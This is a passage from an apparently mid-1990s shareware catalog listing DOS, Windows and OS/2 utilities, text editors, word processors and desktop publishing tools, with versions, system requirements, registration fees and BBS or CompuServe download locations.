files. Has built- + in file viewer and allows copying and pasting descriptions from + text in files or other descriptions. Change directories from + within 4EDIT. Supports mouse. Extensive on-line help. User- + configurable. + + + Product: 4ZIP/4UNZIP + Includes 4DOS file descriptions in ZIP files. See full + description on page 181. + + Product: USEMGR + Know how many times each file on disk is used. See full + description on page 19. + + Chapter 2, "Utilities" 181 + + + + Product: ZIP Fugue (DOS) for PKZIP/UNZIP + ZIP front end - automates 4DOS file descripts. See full + description on page 182. + + Product: ZIP Fugue (Windows) + ZIP handler - automates 4DOS file descripts. See full + description on page 183. + + 2.9.3.1 For 4DOS/NDOS + + Product: 4FILES + File manager, annotator and program launcher. See full + description on page 27. + + 2.9.4 For Norton + + See also: Utilities, Software tools & add-ins, For JP Software. + + 2.9.4.1 For Norton Utilities + + Product: 4FILES + File manager, annotator and program launcher. See full + description on page 27. + + 2.9.5 For PKWARE + + 2.9.5.1 For PKZIP/PKUNZIP + + Product: 4ZIP/4UNZIP + Author: , 703-821-3215 + Version: 2.01 (12-14-91) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. 4DOS; PKZIP/PKUNZIP. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support; + lifetime return policy; bonus utilities. 6-month free upgrading + allowed. + Look for: 4ZIP201.ZIP on BBSs; 4ZIP.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 1 (or contact userID 70741,3711 for + assistance). + Download size: 143k (about eleven minutes with a 2400 baud modem) + Description: + A utility for 4DOS. Used with the PKWare compression program + PKZIP, it compresses 4DOS file descriptions along with the + files. The included program 4UNZIP calls PKUnzip and restores + the descriptions as each file is uncompressed. Select files to + Zip or Unzip from a full-screen list with extended wildcards. + Pass through commands to PKZIP and PKUNZIP, obtained + separately. Supports 4DOS 4.0 80 character descriptions and + extended fields. + + Chapter 2, "Utilities" 182 + + + + Product: BCM Menu System + Menu, disk maint,text editor & compress shell. See full + description on page 162. + + Product: ExamineZip + Text retrieval program for ZIP archives. See full description + on page 14. + + Product: FILE_HANDLE File Management [***] + Management program for DOS, Windows and LANs. See full + description on page 158. + + Product: PMZIP + OS/2 Presentation Manager ZIP shell. See full description on + page 42. + + Product: QFiler + Simple, powerful with 2 side-by-side windows. See full + description on page 160. + + Product: USEMGR + Know how many times each file on disk is used. See full + description on page 19. + + Product: WinZip + Windows ZIP util w/drag & drop, built-in ZIP. See full + description on page 45. + + Product: XMENU + Small, fast shell for LHA, PKZIP, ARJ, etc. See full + description on page 164. + + Product: ZIP Fugue (DOS) for PKZIP/UNZIP + Author: , +61-7-824-2843 + Version: 1.2 (04-19-94) + Needs: IBM PC, DOS 3.3 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $8.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; ZIPD12.ZIP on CompuServe + in CIS:PCVENB forum LIBrary 10 (or contact userID 100036,311 + for assistance). + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + DOS & Windows & 4DOS descripts. Allows you to tag files to add + to a ZIP file in full screen mode, and then add them along with + their 4Dos file descriptions. It also displays the files in the + ZIP file along with their descriptions. You can also tag the + + Chapter 2, "Utilities" 183 + + + + files in ZIP file, and extract them along with their 4DOS file + descriptions. + + + Product: ZIP Fugue (Windows) + Author: , +61-7-824-2843 + Version: 2.0 (04-25-94) + Needs: IBM AT (80286), Windows 3.0 or better. EGA monitor; Hard + disk; Mouse. + Strongly recommended: VGA monitor. + Registration fee: $20.00 (add $8.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; bonus utilities; all ASP-wide offers (see + page 5); disks of other shareware; discounts on other products. + Look for: availability unknown on BBSs; ZIPW20.ZIP on CompuServe + in CIS:PCVENB forum LIBrary 10 (or contact userID 100036,311 + for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + DOS & & Windows & 4DOS descripts. Allows you to tag files to + add to a ZIP file in full screen mode, and then add them along + with their 4Dos file descriptions. It also displays the files + in the ZIP file along with their descriptions. You can also tag + the files in ZIP file, and extract them along with their 4DOS + file descriptions. + + + Product: Zip Server(TM) + PKZIP 2.04g compatible Windows utility. See full description + on page 47. + + Product: ZiPaper + Wallpaper changer uses PKZip to save space. See full + description on page 47. + + 2.9.6 For Sidekick + + Product: VB-Dial + Multimedia phone dialer/comm package. See full description on + page 130. + + 2.9.7 For other + + Product: BCM Menu System + Menu, disk maint,text editor & compress shell. See full + description on page 162. + + Chapter 3, "Writing applications" 184 + + + + + + Chapter 3 + Writing applications + + See also: Utilities, File utilities, File viewers; Education, + Writing. + + + 3.1 Text viewers/readers + + Product: DEXTER Text Editor + Premium quality multi-file text editor. See full description + on page 186. + + Product: MultiVu + Find/view/extract text, browse archive files. See full + description on page 54. + + + 3.2 Text editors + + See also: Writing applications, Word processors. + + Product: BCM Menu System + Menu, disk maint,text editor & compress shell. See full + description on page 162. + + Product: Bingo Text Editor + Author: , 410-379-9019 + Version: 4.00a (10-26-94) + Needs: IBM PC, DOS 3.0 or better. 320k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $75.00 (add $15.00 for shipping to Canadian + addresses) (add $15.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; all ASP- + wide offers (see page 5). + Look for: availability unknown on BBSs; BE400A.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 1 (or contact userID 70541,3614 for + assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + A complete text editing system featuring virtual memory for + files far larger than memory, multi level undo, the Chess + extension lanaguage, customizable Syntax Highlighting, and + user-definable menus. Supprts multiple files, multiple menus, + mouse, keyboard definition, and more. + + Chapter 3, "Writing applications" 185 + + + + Product: BOXER/DOS Text Editor + Author: , 603-924-6602 + Version: 7.0a (06-16-95) + Needs: IBM AT (80286), DOS 3.0 or better. 384k RAM; Dual 720k + floppy drives. + Strongly recommended: Hard disk. + Registration fee: $50.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, newsletter, mail support; 1-month return + policy; bonus utilities; all ASP-wide offers (see page 5); + disks of other shareware; discounts on other products; + discounts on upgrades. 1-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: BOXER*.ZIP on BBSs (call 603-924-3859 to download it at + no charge); BOXER.ZIP on CompuServe in CIS:PCVENI forum LIBrary + 3 (or contact userID 74777,170 for assistance); BOXER*.ZIP on + GEnie in IBMPC forum LIBrary 3 (or contact userID USE INTERNET + for assistance). + Download size: 356k (about 27 minutes with a 2400 baud modem) + Description: + A powerful but courteous text editor which is packed with + features: color syntax highlighting, multi-level undo and redo, + full mouse support, multiple files/windows, macros, graphic + drawing, column marking, compile from editor, word processing, + and context sensitive help. Search & replace with wildcards; + globally, selectively or across all edited files. + Reconfigurable keyboard with popular maps supplied; pull-down + menus & online help change dynamically to reflect reassignment. + Much more! + + + Product: BOXER/OS2 Text Editor + Author: , 603-924-6602 + Version: 7.0a (06-16-95) + Needs: IBM 80386, OS/2 2.0 or better. Hard disk. + Registration fee: $89.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + newsletter, mail support; 1-month return policy; all ASP-wide + offers (see page 5); disks of other shareware; discounts on + other products; discounts on upgrades. 1-month free upgrading + allowed. 1 free update disk(s) sent out. + Look for: BOXOS2*.ZIP on BBSs (call 603-924-3859 to download it + at no charge); BOXOS2.ZIP on CompuServe in CIS:PCVENI forum + LIBrary 3 (or contact userID 74777,170 for assistance); + + Chapter 3, "Writing applications" 186 + + + + BOXOS2*.ZIP on GEnie in OS2 forum LIBrary 11 (or contact userID + USE INTERNET for assistance). + Download size: 437k (about 33 minutes with a 2400 baud modem) + Description: + A powerful but courteous editor which is packed with features: + color syntax highlighting, multi-level undo and redo, full + mouse support, macros, graphic drawing, column marking, compile + from editor, word processing, and context sensitive help. This + 32-bit charcter mode program supports HPFS filenames and makes + full use of OS/2's virtual memory to edit very large files. + Fully reconfigurable keyboard: pull-down menus & online help + change dynamically to reflect reassignment. Much more! + + + Product: CMFiler + File manager for DOS. See full description on page 157. + + Product: CODE-A-LINE + Outline processor, text editor, printing util. See full + description on page 192. + + Product: DEXTER Text Editor + Author: , 604-984-7330 + Version: 2.00 (01-16-95) + Needs: IBM PC, DOS 2.0 or better. 180k RAM. + Registration fee: $44.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; 3-month return policy; bonus utilities. 3-month free + upgrading allowed. + Look for: DEXTER.ZIP on BBSs; DEXTER.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 1 (or contact userID 70253,1046 for + assistance). + Download size: 110k (about eight minutes with a 2400 baud modem) + Description: + DEXTER is a PREMIUM QUALITY, super fast, full featured, multi- + file text editor which is compact and EASY to use. Has + interactive multi-file search & replace, NO FILE SIZE LIMIT, + split and/or boxed windows, context sensitive help, on-line + local & global configuration, keyboard reconfig, wonderful + customizable menus, TEMPORARY QUIT, word processing, line + drawing, column blocks, macros, multiple printers, ASCII table, + 43/50 line mode, colour or b/w. Don't let the size fool you, + this one's loaded. + + Chapter 3, "Writing applications" 187 + + + + Product: EDITEUR [***] + Author: + Version: V2.3 (10-01-95) + Needs: IBM 80386, Windows 95 or better. 300k RAM; VGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $29.95 + Registration benefits: 31/2" master disk(s); lifetime unlimited + fax, BBS, CompuServe, mail support. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; EDIT95.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 1 (or contact userID 73261,2701 for + assistance). + SWREG#: 1737 + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + Text editor. Fast and compact, easy to use, good looking. + Handles Windows, Dos, and Unix text files. Multitext, unlimited + file size (good at handling large files). Lots of features. + + + Product: ELFTREE + Packs 100s of file/dir/pgm management utils. See full + description on page 163. + + Product: MEGA EDIT Editor for Windows + Author: , 502-589-6800 + Version: 2.11 (03-24-94) + Needs: IBM AT (80286), Windows 3.0 or better. 125k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $35.50 (add $3.50 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $9.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; lifetime return policy; all ASP-wide + offers (see page 5); disks of other shareware. Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; MEGAED.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 2 (or contact userID 76130,1463 + for assistance). + Download size: 140k (about eleven minutes with a 2400 baud modem) + Description: + A Windows application that allows editing of very large text + files. Named "WinAp of the Month" by Compute! magazine and + included in PC World's "Best programs for under $50." Has + split screen for up to 20 files, variable sizable display + fonts, import/export UNIX & Mac files, word-wrap, formatted + display of binary files, search & replace, fully CUA compliant, + and file size only limited by Windows virtual memory. America + Online "Editors Choice." + + Chapter 3, "Writing applications" 188 + + + + Product: PostCardMaster + Postcard & mail handling system. See full description on + page 242. + + Product: Power Edit + Network text editor, email, file encryption. See full + description on page 377. + + Product: QENV + Quick envelope addressor & letter writer. See full description + on page 85. + + Product: Ravitz Editor + Author: + Version: 1.10b (08-12-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Registration fee: $0.00 + Registration benefits: + Look for: RAVED.ZIP on BBSs (call 606-268-0577 to download it at + no charge); RAVED.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 1 (or contact userID 70431,32 for assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + A fast, powerful, mid sized text editor. It has integrated + outlining and overviewing, area mark manipulation (copy, fill, + shift, sort, etc.), find/change, word wrap and reflow, line + drawing, multiple file handling, change tracking, flexible user + interface (function keys, mouse, menus), and it is configurable + and programmable. + + + Product: READ + Author: , 813-447-0604 + Version: 2.9 (09-28-95) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hard disk. + Strongly recommended: HP LaserJet printer; Mouse; Epson + printer; math coprocessor. + Registration fee: $12.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + CompuServe, mail support; 3-month limited return policy. + 3-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: READ29.ZIP on BBSs. + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + A compact DOS program for reading and editing ASCII text files + of virtually unlimited size. Includes a versatile file + selection menu, word wrap, search-and-replace, cut-and- paste + and printer support. Reads huge files by breaking them into + + Chapter 3, "Writing applications" 189 + + + + segments. Mouse supported. Has on-line help, and comes with an + ASCII text file (READ.DOC) describing features. + + + Product: Technical Editor (DOS) + Author: , 415-474-9973 + Version: 2.80 (08-15-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Registration fee: $39.95 + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, CompuServe, mail support; 1-month return policy; all ASP- + wide offers (see page 5). 2-month free upgrading allowed. + Look for: TE280DOS.ZIP on BBSs (call 7147519307 to download it at + no charge); TE280D.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 0. + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Fast DOS programmers editor. Edits any size file. Multi-screen + and multi-window editing. Undo last 1000 changes. Redefinable + keys. Line and column blocking. Interactive configuration. + 25,43,50 line modes. Single small executable contains entire + program. Keystroke macros (can save and load from disk). Edits + binary files. History file: remembers last 20 files edited + including what line and column you were on. + + + Product: Technical Editor (OS/2) + Author: , 415-474-9973 + Version: 2.80 (08-15-94) + Needs: IBM 80386, OS/2 2.0 or better. + Registration fee: $39.95 + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, CompuServe, mail support; 1-month return policy; all ASP- + wide offers (see page 5). 2-month free upgrading allowed. + Look for: TE280OS2.ZIP on BBSs (call 7147519307 to download it at + no charge); TE265*.ZIP on CompuServe in CIS:IBMOS2 forum + LIBrary 0. + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Fast 32 bit OS/2 2.0 programmers editor. Multi-screen and + multi-window editing. UNDO last 1000 changes. Redefinable keys. + Line and rectangular blocking. Interactive configuration. + 25,43,50 line modes. Single small executable contains entire + program. Supports up to 50000 character lines with no line + limit. Keystroke macros (can be saved and loaded from disk). + Edits binary files. History file: Remembers last 20 files + edited with row/column position. + + Chapter 3, "Writing applications" 190 + + + + Product: Technical Editor (Windows NT) + Author: , 415-474-9973 + Version: 2.80 (08-15-94) + Needs: IBM PC, Windows 3.0 or better. 1000k RAM. + Registration fee: $39.95 + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, CompuServe, mail support; all ASP-wide offers (see + page 5). + Look for: TE280NT.ZIP on BBSs (multiple files) (call 7147519307 + to download it at no charge). + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Full-featured, fast and powerful programmers editor. Edits + files larger than available RAM under DOS. 32 bit versions for + OS/2 and now Windows NT. Multi-Window, keyboard configurable, + undo, and everything else. Selected as personal favorite in + Computer Language Magazine review (June 91). + + + Product: TextPad 16 + Author: + Version: 1.30 (09-02-95) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: 30.00L- (add 5.00L- for shipping to U.S. + addresses) (add 5.00L- for shipping to Canadian addresses) (add + 5.00L- for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited fax, CompuServe, mail support; all + ASP-wide offers (see page 5). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; TPAD16.ZIP on CompuServe + in CIS:WINUTIL forum LIBrary 6 (or contact userID 100041,235 + for assistance). + SWREG#: 3938 + PsL#: 11709 + Download size: 450k (about 34 minutes with a 2400 baud modem) + Description: + 1995 Ziff-Davis Shareware Awards Winner. + "Setting new standards... 10/10" - PC Plus, May 95 + "Best editor for Windows that we've ever seen" - + Windows User, Aug 95 + Has "warm start"; OEM to ANSI conversion; group edits on lines + with bookmarks; block fills. Edits files with up to 32,000 + lines; MDI with 2 views per file; 31 edit commands; true drag & + drop editing; full undo/redo; block select; visible bookmarks; + hex views; GREP and File Compare; and much more. + + Chapter 3, "Writing applications" 191 + + + + Product: TextPad 32 + Author: + Version: 1.30 (09-02-95) + Needs: IBM 80386, Windows NT 3.1 or better. + Registration fee: 30.00L- (add 5.00L- for shipping to U.S. + addresses) (add 5.00L- for shipping to Canadian addresses) (add + 5.00L- for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited fax, CompuServe, mail support; all + ASP-wide offers (see page 5). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; TPAD32.ZIP on CompuServe + in CIS:WINUTIL forum LIBrary 9 (or contact userID 100041,235 + for assistance). + SWREG#: 3938 + PsL#: 11709 + Download size: 450k (about 34 minutes with a 2400 baud modem) + Description: + 1995 Ziff-Davis Shareware Awards Winner. + "The best 32-bit text editor I've seen! It's fast, + loaded with features, and beautifully done. Get it!" - + Dr File Finder. + Has "warm start"; OEM to ANSI conversion; group edits on lines + with bookmarks; block fills. No limit to file length; MDI with + 2 views per file; 31 edit commands; true drag & drop editing; + full undo/redo; block select; visible bookmarks; hex views; + GREP and file compare; much more. + + + Product: WebPen + HTML web page editor. See full description on page 425. + + 3.2.1 Text/binary editors + + Product: DO + FAST text/bnry file manipulator, sort, filter. See full + description on page 29. + + Chapter 3, "Writing applications" 192 + + + + 3.3 Text organizers/outliners + + Product: CODE-A-LINE + Author: , 312-561-6363 + Version: 1.0 (03-22-94) + Needs: IBM AT (80286), Windows 3.1 or better. 128k RAM; Program + can run safely on a system with no hard disk and only one + floppy disk drive; VGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $15.00 + Registration benefits: lifetime unlimited phone, fax, CompuServe, + mail support; all ASP-wide offers (see page 5); discounts on + other products. + Look for: availability unknown on BBSs; CODE.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 10 (or contact userID 75020,3617 for + assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + Folding outliner/editor for ASCII text files (e.g. program + source code). Represent structure by indenting lines. Fold and + unfold program elements. Edit and restructure text with + unlimited Undo. Print professionally-looking source code + listings, complete with page headings and line numbers. + Customizable fonts, colors, etc. Maintain several sets of + customization options, via configuration files, fine-tuned for + different purposes (e.g. editing vs. printing). + + + Product: DeskTop Advisor(R) + Create/browse popup hypertext w/images, sound. See full + description on page 424. + + Product: Ravitz Editor + Text editor/outliner. See full description on page 188. + + Chapter 3, "Writing applications" 193 + + + + Product: WhizNotes + Author: , 314-965-5630 + Version: 2.0 (03-20-94) + Needs: IBM AT (80286), Windows 3.1 or better. Microsoft help + compiler (for help file generation). + Registration fee: $49.95 (add $4.50 for shipping to U.S. + addresses) (add $4.50 for shipping to Canadian addresses) (add + $9.00 for shipping outside U.S. or Canada) + Registration benefits: quick-reference card; 3 months of + unlimited CompuServe, mail support; 1-month return policy; + royalty-free runtime license; bonus utilities; discounts on + upgrades. + Look for: availability unknown on BBSs; WHIZNT.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 0 (or contact userID 71303,20 for + assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Powerful text organizer and help generator. Begin using it and + never lose track of your ideas and notes. Use long descriptive + names for your notes, group them into folders, easily retrieve + and view them, search through them for any piece of + information, insert hypertext jumps to move from note to + note,... That's not all! You can convert your notes into + Windows Help with just a click on the menu. Many advanced + features for note-taking and help generation. + + + 3.4 Word processors + + See also: Writing applications, Text editors. + + Product: Bookbild/DOS Pamphlet Publisher + Converts doc. file to camera-ready booklet. See full + description on page 223. + + Product: BOXER/DOS Text Editor + Full-featured text editor/word processor. See full description + on page 185. + + Product: BOXER/OS2 Text Editor + Full-featured text editor/word processor. See full description + on page 185. + + Product: Cumberland Diary + Powerful diary/journal entry program. See full description on + page 149. + + Product: Cumberland Story + Write your own or ancestors life story. See full description + on page 540. + + Chapter 3, "Writing applications" 194 + + + + Product: Easy Word + Author: , 01625-614669 + Version: 9.2 (06-16-95) + Needs: IBM AT (80286), DOS 5.0 or better. 640k RAM; Hard disk. + Registration fee: $45.00 + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of unlimited CompuServe, mail support; all ASP-wide + offers (see page 5). + Look for: availability unknown on BBSs; EW.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 2 (or contact userID 100410,717 for + assistance). + SWREG#: 3047 + PsL#: 11490 + Download size: 751k (about 56 minutes with a 2400 baud modem) + Description: + Probably the easiest word processor to learn. Facilities + include line drawing, table entry mode and macros. Will batch + print odd and even pages separately for double sided printing. + Secure erase facility for classified documents and built-in + backup system. + + + Product: EnVision Publisher + Desktop publishing program (full-feature). See full + description on page 198. + + Product: Hebrew Edit + Author: , 416-489-7440 + Version: 1.2b (02-14-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Dual 720k floppy drives; Hard disk; HP + DeskJet printer; HP LaserJet printer; Epson printer. + Strongly recommended: VGA monitor. + Registration fee: $19.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, fax, CompuServe, mail support; 2-month return policy; + bonus templates; all ASP-wide offers (see page 5); discounts on + other products; discounts on upgrades. + Look for: availability unknown on BBSs; HEBED.ZIP on CompuServe + in CIS:FLEFO forum LIBrary 14 (or contact userID 71542,3631 for + assistance). + Download size: 143k (about eleven minutes with a 2400 baud modem) + Description: + Hebrew text editor that supports the Hebrew vowels (Nikud). Has + bilingual menus, clear bright screen fonts. Prints beautiful + large letters in block or script fonts, on all major printers + (LaserJet, DeskJet, Dot matrix). Practice your Hebrew with the + sample files that are included. + + Chapter 3, "Writing applications" 195 + + + + Product: The Letterhead Kit/DOS + Retrieves custom letterheads, graphics, bills. See full + description on page 225. + + Product: The Letterhead Kit/Win + Retrieves custom letterheads, graphics, bills. See full + description on page 225. + + Product: My Life + Diary and Journal for young & old alike. See full description + on page 566. + + Product: QENV + Quick envelope addressor & letter writer. See full description + on page 85. + + Product: Technical Editor (OS/2) + 32-bit programmers editor for OS/2 2.x. See full description + on page 189. + + Product: Word Fugue + Author: , +61-7-824-2843 + Version: 3.1 R1 (01-15-94) + Needs: IBM PC, DOS 3.0 or better. 400k RAM; Dual 720k floppy + drives; Hard disk. + Registration fee: $55.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 1-month return policy; bonus utilities; all ASP- + wide offers (see page 5). 2-month free upgrading allowed. + Writing style guide; sample documents. + Look for: availability unknown on BBSs; WF310*.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 3 (multiple files) (or contact + userID 100036,311 for assistance). + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + Industrial strength word processor. Multiple file editing (up + to 8 windows & copy text between), pull down menus, autosave, + macros, context sensitive help, tables & columns (with + independent wrap), newspaper (snaking) columns, automatic + footnotes and endnotes, generation of table of contents & + indexes, spell checker, supports many printers (also lasers & + postscript), comprehensive mail merge (including IF ELSE). + Built in calculator (also available during printing), revision + marking and more + + Chapter 3, "Writing applications" 196 + + + + Product: Writer's Cramp + Author: + Version: 2.2 (09-30-94) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; EGA monitor; + Hard disk; VBRUN300.DLL. PKUNZIP v2.04G or later. + Strongly recommended: VGA monitor; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse; Epson printer. + Registration fee: $9.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + BBS, CompuServe, mail support; 3-month return policy; all ASP- + wide offers (see page 5); discounts on upgrades. 3-month free + upgrading allowed. + Look for: WRCR22.ZIP on BBSs (call 602-814-0483 to download it at + no charge); WRCR22.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71162,2311 for assistance). + SWREG#: 2475 + Download size: 1223k (about 91 minutes with a 2400 baud modem) + Description: + An inexpensive and simple word processor with many of the + features found in major word processors. Uses a database to + store its letters. Multiple letter databases can be created, + one for each member of the family. Each letter database can be + password protected. + + + 3.5 Desktop publishing + + Product: AdMaker + Author: , 805-528-1759 + Version: 3.5 (05-06-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Registration fee: $30.00 + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited fax, BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 5); discounts on upgrades. Lifetime free upgrading + allowed. + Look for: ADMAKER.ZIP on BBSs (call 805-528-3753 to download it + at no charge); ADMAKE.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 190k (about 14 minutes with a 2400 baud modem) + Description: + Lets you design display ads up to 7.5" X 9.5" in Windows. Use + TT/ATM fonts; BMP/PCX clip art; line drawing tools. Print 100% + or 200% size layouts. Rotate text; click to position text; + insert special characters; filled boxes; text can overwrite + graphics; WYSIWYG display; right-click help; much, much more. + Use to create ads for your business or for others. Fast, easy, + and accurate! Use for any simple display ad. Much faster than + using Corel. + + Chapter 3, "Writing applications" 197 + + + + Product: Bookbild/DOS Pamphlet Publisher + Converts doc. file to camera-ready booklet. See full + description on page 223. + + Product: Bookbild/Win Pamphlet Publisher + Builds single-fold brochures in WPWIN 5.2. See full + description on page 223. + + Product: Crossword Clipper for DOS + Author: , 909-797-3091 + Version: 2.00 (04-15-94) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor. Crossword Creator for puzzle design. + Strongly recommended: Mouse. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; 1-month return policy; discounts on other products. + 3-month free upgrading allowed. + Look for: CLPD20.ZIP on BBSs; CWCLPD.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 8 (or contact userID 72357,3523 for + assistance). + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + This crossword layout tool creates .PCX graphic files, suitable + for importing into word-processors or graphics applications. + WYSIWYG display lets you resize the puzzle grid, select fonts, + etc. Also creates ASCII text files containing puzzle clues. + Cannot be used for puzzle design, but will accept crossword + data files (.XWP format only) from other programs. + + + Product: Crossword Clipper for Windows + Author: , 909-797-3091 + Version: 2.00 (04-15-94) + Needs: IBM 80386, Windows 3.1 or better. Crossword Creator for + puzzle design. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support. 1-month return policy. 3-month free upgrading allowed. + Look for: CLIP20.ZIP on BBSs; CWCLIP.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 8 (or contact userID 72357,3523 for + assistance). + Download size: 370k (about 28 minutes with a 2400 baud modem) + Description: + This crossword layout tool works with the Windows Clipboard, + enabling you to paste your puzzles into any Windows + application. WYSIWYG display lets you resize the puzzle grid, + + Chapter 3, "Writing applications" 198 + + + + select fonts, etc. Also creates Windows bitmap (.BMP) graphic + files. Cannot be used for puzzle design, but will accept + crossword data files (.XWP format only) from other programs. + + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 462. + + Product: EDGEFLOW + Flowcharting and diagramming tool for DOS. See full + description on page 487. + + Product: EnVision Publisher + Author: , 813-545-4354 + Version: 1.0 (09-01-92) + Needs: IBM PC, DOS 2.0 or better. CGA or Hercules monitor. + Strongly recommended: mouse, hard disk. + Registration fee: $69.00 + Registration benefits: Printed manual, master disks, bonus + clipart libraries & scalable fonts, newsletter support, 